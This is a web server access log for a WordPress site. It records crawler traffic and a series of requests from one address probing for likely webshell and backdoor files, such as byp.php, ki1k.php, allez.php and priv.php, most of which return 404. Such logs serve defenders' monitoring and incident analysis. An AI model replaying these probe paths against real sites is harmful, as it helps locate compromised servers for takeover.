13.79.243.123 - - [13/Jul/2025:08:23:30 -0400] "GET /byp.php HTTP/1.1" 404 23126 "-" "-"
20.171.207.193 - - [13/Jul/2025:08:23:30 -0400] "GET /237aejfl35110.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
13.79.243.123 - - [13/Jul/2025:08:23:36 -0400] "GET /wp-admin/images/file.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:23:40 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 404 23126 "-" "-"
66.29.146.47 - - [13/Jul/2025:08:23:45 -0400] "POST /wp-cron.php?doing_wp_cron=1752409424.9520339965820312500000 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
13.79.243.123 - - [13/Jul/2025:08:23:44 -0400] "GET /wp-content/themes/astra/inc/ki1k.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:23:48 -0400] "GET /wp-admin/about.php HTTP/1.1" 302 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:23:49 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fdangroup.sa%2Fwp-admin%2Fabout.php&reauth=1 HTTP/1.1" 200 3154 "-" "-"
43.163.104.54 - - [13/Jul/2025:08:23:47 -0400] "GET / HTTP/1.1" 200 33218 "http://danevnt.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
13.79.243.123 - - [13/Jul/2025:08:23:50 -0400] "GET /wp-content/themes/twentytwenty/404.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:23:51 -0400] "GET /300zmrg2797.html HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:23:56 -0400] "GET /cgi-bin/file.php HTTP/1.1" 404 23128 "-" "-"
47.82.60.32 - - [13/Jul/2025:08:23:58 -0400] "GET /items/sfnqe243/47069?key=discourage HTTP/1.1" 404 23126 "https://dangroup.sa/items/sfnqe243/47069?key=discourage" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
136.243.228.194 - - [13/Jul/2025:08:23:58 -0400] "GET /items/fvmgo29/28787?key=across HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:24:03 -0400] "GET /wp-includes/SimplePie/wp-login.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:24:06 -0400] "GET /items/fxqsp79/66791?key=frequent HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:24:08 -0400] "GET /wp-includes/wp-load.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:24:13 -0400] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 0 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:24:13 -0400] "GET /items/rzjat243/46189?key=portrait HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:24:14 -0400] "GET /wp-content/plugins/revslider/includes/external/page/ HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:24:19 -0400] "GET /wp-admin/js/index.php HTTP/1.1" 301 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:24:20 -0400] "GET /wp-admin/js/ HTTP/1.1" 200 2906 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:24:18 -0400] "GET /items/rbnno25/17041?key=reaction HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:24:20 -0400] "GET /priv.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:24:24 -0400] "GET /27yqt36058.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:24:25 -0400] "GET /wordpress/wp-includes/IXR/allez.php HTTP/1.1" 404 23126 "-" "-"
20.171.207.193 - - [13/Jul/2025:08:24:30 -0400] "GET /272fyuuz12189.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
13.79.243.123 - - [13/Jul/2025:08:24:30 -0400] "GET /menu.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:24:31 -0400] "GET /297tqip11616.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:24:38 -0400] "GET /wp-admin/404.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:24:39 -0400] "GET /items/zgymx151/30159?key=write HTTP/1.1" 404 23128 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:24:41 -0400] "GET /default.php HTTP/1.1" 404 23126 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:24:46 -0400] "GET /xmlrpc.php HTTP/1.1" 403 1242 "-" "-"
66.29.146.47 - - [13/Jul/2025:08:24:47 -0400] "POST /wp-cron.php?doing_wp_cron=1752409486.9315929412841796875000 HTTP/1.1" 403 1242 "-" "WordPress/6.8; https://dangroup.sa"
47.82.60.19 - - [13/Jul/2025:08:24:47 -0400] "GET /78qxvrv3223.html HTTP/1.1" 301 0 "https://www.dangroup.sa/78qxvrv3223.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
13.79.243.123 - - [13/Jul/2025:08:24:46 -0400] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 404 23128 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:24:52 -0400] "GET /.well-known/pki-validation/admin.php HTTP/1.1" 404 1251 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:24:47 -0400] "GET /items/rphrt11/48177?key=dismiss HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
13.79.243.123 - - [13/Jul/2025:08:24:52 -0400] "GET /wp-content/languages/index.php HTTP/1.1" 301 0 "-" "-"
13.79.243.123 - - [13/Jul/2025:08:24:53 -0400] "GET /wp-content/languages/ HTTP/1.1" 200 3273 "-" "-"
47.82.60.19 - - [13/Jul/2025:08:24:49 -0400] "GET /78qxvrv3223.html HTTP/1.1" 404 23126 "https://www.dangroup.sa/78qxvrv3223.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
13.79.243.123 - - [13/Jul/2025:08:24:53 -0400] "GET /2.php HTTP/1.1" 404 23126 "-" "-"
136.243.228.194 - - [13/Jul/2025:08:24:54 -0400] "GET /204nblqo39191.html HTTP/1.1" 404 23126 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
